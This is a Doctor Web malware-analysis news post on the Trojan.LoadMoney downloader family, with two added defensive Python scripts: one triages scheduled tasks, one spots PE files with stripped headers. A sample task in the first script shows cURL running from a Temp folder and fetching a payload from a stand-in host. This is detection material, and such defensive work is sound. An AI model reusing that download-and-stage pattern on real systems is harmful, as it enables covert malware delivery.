Doctor Web: new downloader Trojans operate on the sly
March 6, 2018
The Trojan.LoadMoney malware family has been well known since 2013, and new representatives of this family appear regularly. One of these Trojans is Trojan.LoadMoney.3209. It contains two Internet addresses that are used to download and launch other malware. At the time of the research, the Trojan downloaded an identically encrypted file from both addresses and saved it in a temporary folder under a random name. This file was then loaded into memory, deleted from disk, and written again to a temporary folder under another random name. Finally, the resulting executable was read into memory and launched, and the original file was deleted.
One of the files that Trojan.LoadMoney.3209 downloads is detected as Trojan.LoadMoney.3558. This malicious program is more complicated. Trojan.LoadMoney.3558 acts as the main system infector and uses the freely distributed cURL utility for downloading files. This utility allows it to interact simultaneously with multiple Internet servers over several different protocols. The Trojan decrypts the cURL files and saves them to disk. To download files to the infected computer with cURL, Trojan.LoadMoney.3558 uses the Windows Task Scheduler. The Trojan contains four encrypted addresses of Internet resources, one of which is used to operate with the cURL utility; the other addresses are used to download an executable file, detected as Trojan.LoadMoney.3263, which is launched covertly. Upon launching, the original file, Trojan.LoadMoney.3263, is deleted.
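The combination described above (a scheduled task whose action is a cURL download into a temporary folder) is something a defender can triage from exported task definitions. The following script is an added example, not code from Doctor Web or from the malware itself. It parses Task Scheduler XML (the real `http://schemas.microsoft.com/windows/2004/02/mit/task` namespace with `Exec`/`Command`/`Arguments` elements) and flags tasks that combine two or more indicators: a cURL binary, a binary living in a temp folder, and a download written to a temp folder. The three task records, task names, paths and `.invalid` hostnames are constructed sample data, not values from the report.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath
from typing import Dict, List

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
# Folder fragments treated as "temporary" locations (lower-cased comparison).
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
OUTPUT_RE = re.compile(r"(?:^|\s)(?:-o|--output)\s+(\S+)")


def in_temp_dir(path: str) -> bool:
    """True when the Windows path points into a well-known temp folder."""
    return any(marker in path.lower() for marker in TEMP_MARKERS)


def task_reasons(task_xml: str) -> List[str]:
    """Return the suspicious indicators found in one Task Scheduler XML definition."""
    root = ET.fromstring(task_xml)
    reasons: List[str] = []
    for exe in root.iter(TASK_NS + "Exec"):
        command = (exe.findtext(TASK_NS + "Command") or "").strip()
        args = (exe.findtext(TASK_NS + "Arguments") or "").strip()
        exe_name = PureWindowsPath(command).name.lower()
        urls = URL_RE.findall(args)
        out_match = OUTPUT_RE.search(args)
        out_path = out_match.group(1) if out_match else ""
        if exe_name in ("curl.exe", "curl") and urls:
            reasons.append("curl downloads from " + urls[0])
        if in_temp_dir(command):
            reasons.append("task binary lives in a temp folder")
        if out_path and in_temp_dir(out_path):
            reasons.append("download is written to a temp folder")
    return reasons


def triage_tasks(tasks: Dict[str, str], threshold: int = 2) -> Dict[str, List[str]]:
    """Map task name -> reasons for every task with at least `threshold` indicators."""
    flagged = {}
    for name, xml_text in tasks.items():
        reasons = task_reasons(xml_text)
        if len(reasons) >= threshold:
            flagged[name] = reasons
    return flagged


def _task(command: str, arguments: str) -> str:
    # Helper that wraps an action in the minimal Task Scheduler XML envelope.
    return (
        '<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task" version="1.2">'
        "<Actions Context=\"Author\"><Exec>"
        f"<Command>{command}</Command><Arguments>{arguments}</Arguments>"
        "</Exec></Actions></Task>"
    )


# Constructed sample task definitions (raw strings keep the backslashes literal).
SAMPLE_TASKS: Dict[str, str] = {
    "NightlyBackup": _task(r"C:\Windows\System32\robocopy.exe", r"D:\data E:\backup /MIR"),
    # Legitimate admin job: curl from a tools folder writing to a normal directory.
    "ReportSync": _task(r"C:\Tools\curl.exe",
                        r"-sS -o C:\Reports\feed.json https://reports.example.invalid/feed.json"),
    # Pattern from the report: curl dropped in %TEMP%, fetching into %TEMP%.
    "Update-kq7r": _task(r"C:\Users\victim\AppData\Local\Temp\kq7r\curl.exe",
                         r"-s -o C:\Users\victim\AppData\Local\Temp\w3xn.tmp http://payload-host.invalid/f"),
}

if __name__ == "__main__":
    for name, reasons in triage_tasks(SAMPLE_TASKS).items():
        print(name + ": " + "; ".join(reasons))
```

On a real host the XML for each task can be exported with `schtasks /query /xml` and fed to `triage_tasks`; the two-indicator threshold keeps an ordinary administrative cURL job out of the result while the temp-folder pattern from the report is flagged.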
After downloading, the Trojan extracts the executable file, restores its header, saves it to a temporary folder, and then launches it. This file is detected by Dr.Web as Trojan.Siggen7.35395. Because the virus writers did not implement any visible effects in the malicious code, none of the mentioned Trojans manifest themselves in the infected system, so detecting their malicious activity is not easy.
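The report says the downloaded payload only becomes a runnable executable after its header is "restored", which means that while it sits on disk the file does not look like a normal PE image. The checker below is an added example, not the report's or the malware's code; it assumes (as a labelled guess, since the report does not say exactly which bytes are missing) that the DOS header carrying the `MZ` magic and `e_lfanew` pointer is absent, and it classifies a blob as a valid PE, as a PE whose DOS header has been stripped (a `PE\0\0` signature with a plausible COFF machine type and optional-header magic but no `MZ` in front), or as not a PE at all. The sample image bytes are constructed in the script.

```python
import struct
from typing import Optional

KNOWN_MACHINES = {0x014C, 0x8664, 0x01C0, 0xAA64}   # i386, x86-64, ARM, ARM64
OPT_MAGICS = {0x10B, 0x20B}                          # PE32, PE32+


def parse_pe_header(data: bytes) -> Optional[dict]:
    """Return basic header fields if `data` starts with a valid MZ/PE header, else None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 26 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsections = struct.unpack_from("<HH", data, e_lfanew + 4)
    opt_magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
    if machine not in KNOWN_MACHINES or opt_magic not in OPT_MAGICS:
        return None
    return {"e_lfanew": e_lfanew, "machine": machine,
            "sections": nsections, "optional_magic": opt_magic}


def find_headerless_pe(data: bytes) -> Optional[int]:
    """Offset of a plausible PE signature in a blob that lacks an MZ header, else None."""
    pos = data.find(b"PE\0\0")
    while pos != -1:
        if pos + 26 <= len(data):
            machine = struct.unpack_from("<H", data, pos + 4)[0]
            opt_magic = struct.unpack_from("<H", data, pos + 24)[0]
            if machine in KNOWN_MACHINES and opt_magic in OPT_MAGICS:
                return pos
        pos = data.find(b"PE\0\0", pos + 1)
    return None


def classify(data: bytes) -> str:
    """'pe' for a normal image, 'dos-header-stripped' for a staged payload, else 'not-pe'."""
    if parse_pe_header(data) is not None:
        return "pe"
    if find_headerless_pe(data) is not None:
        return "dos-header-stripped"
    return "not-pe"


def build_sample_pe() -> bytes:
    """Construct a minimal 32-bit PE header (DOS stub + COFF header + optional header)."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew points right after the DOS header
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", 0x014C, 1, 0, 0, 0, 0xE0, 0x0102)
    optional = struct.pack("<H", 0x10B) + bytes(0xE0 - 2)
    return bytes(dos) + coff + optional


def strip_dos_header(image: bytes) -> bytes:
    """Zero the first 0x40 bytes, the assumed on-disk form of the staged payload."""
    return bytes(0x40) + image[0x40:]


if __name__ == "__main__":
    image = build_sample_pe()
    for label, blob in (("intact", image), ("staged", strip_dos_header(image)),
                        ("text", b"just a text file\n")):
        print(f"{label}: {classify(blob)}")
```

A scan of `%TEMP%` that reports files classified as `dos-header-stripped` gives a concrete hook for the otherwise silent staging step the report describes.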
Doctor Web virus analysts continue to examine this family of malicious programs and dangerous files. As we receive more news about this family, we will continue to inform our readers. Dr.Web anti-virus products securely protect against all known representatives of the Trojan.LoadMoney family, so they do not pose a threat to our users.

#mining #Trojan